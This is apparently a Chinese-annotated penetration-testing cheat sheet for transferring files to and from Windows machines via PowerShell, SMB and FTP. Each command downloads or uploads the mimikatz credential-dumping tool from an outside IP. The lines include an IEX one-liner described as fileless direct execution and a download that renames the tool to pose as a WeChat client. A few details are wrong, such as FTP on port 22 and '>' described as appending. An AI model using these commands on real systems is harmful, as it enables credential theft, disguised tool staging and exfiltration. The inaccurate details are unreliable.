Powershell
(New-Object Net.WebClient).DownloadFile('http://12.11.1.1/mimikatz.exe','Wechat_client.exe')
(New-Object Net.WebClient).DownloadFileAsync('http://12.11.1.1/mimikatz.exe','mimikatz.exe')*下载到文件到本地,保存文件名,下面是异步下载方法
IEX (New-Object Net.WebClient).DownloadString('http://12.11.1.1/mimikatz.exe')
(New-Object Net.WebClient).DownloadString('http://12.11.1.1/mimikatz.exe') | IEX*无文件传输,直接执行
Invoke-WebRequest -Uri 'http://12.11.1.1/mimikatz.exe' -OutFile 'mimikatz.exe'
iwr -Uri 'http://12.11.1.1/mimikatz.exe' -OutFile 'mimikatz.exe'*powershell3.0支持
SMB Downloads
sudo impacket-smbserver share -smb2support /tmp/smb_share
copy \\12.11.1.1\mimikatz.exe*先开启服务再下载文件
sudo impacket-smbserver share -smb2support /tmp/smbshare -user johnDoe -password Sup3rP@ssw0rd!
net use z: \\12.11.1.1\share /user:johnDoe Sup3rP@ssw0rd!*由于新版windows禁止未经身份验证的访问,所以可以设置用户名和密码
FTP Downloads
sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21*注意第二条命令可以自定义端口
(New-Object System.Net.WebClient).DownloadFile('ftp://12.11.1.1/mimikatz.exe','mimikatz.exe')
echo open 12.11.1.1 22 > ftp.txt
echo USER anonymous >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo BYE >> ftp.txt
ftp -v -s:ftp.txt给定的命令用于创建一个脚本文件(ftp.txt),可以执行使用FTP命令行实用程序进行FTP操作。我们来逐个解释这些命令的目的:
echo open 12.11.1.1 22 > ftp.txt:此命令将文本open 12.11.1.1 22追加到ftp.txt文件中。open命令用于在端口22上与IP地址为12.11.1.1的FTP服务器建立连接。echo USER anonymous >> ftp.txt:此命令将文本USER anonymous追加到ftp.txt文件中。USER命令用于指定FTP会话的用户名。在这种情况下,它将用户名设置为anonymous。echo GET mimikatz.exe >> ftp.txt:此命令将文本GET mimikatz.exe追加到ftp.txt文件中。GET命令用于从FTP服务器下载文件,这里的文件名是mimikatz.exe。echo BYE >> ftp.txt:此命令将文本BYE追加到ftp.txt文件中。BYE命令用于关闭FTP会话。
最后,ftp -v -s:ftp.txt命令将使用ftp.txt文件作为脚本来执行FTP操作。-v选项用于启用详细输出,-s选项指定要执行的脚本文件。
FTP Uploads
sudo python3 -m pyftpdlib --port 21 --write(New-Object System.Net.WebClient).UploadFile('ftp://12.11.1.1/mimikatz.exe','C:\Users\Public\mimikatz.exe')
echo open 12.11.1.1 22 > ftp.txt
echo USER anonymous >> ftp.txt
echo binary >> ftp.txt
echo PUT mimikatz.exe >> ftp.txt
echo BYE >> ftp.txt
ftp -v -s:ftp.txt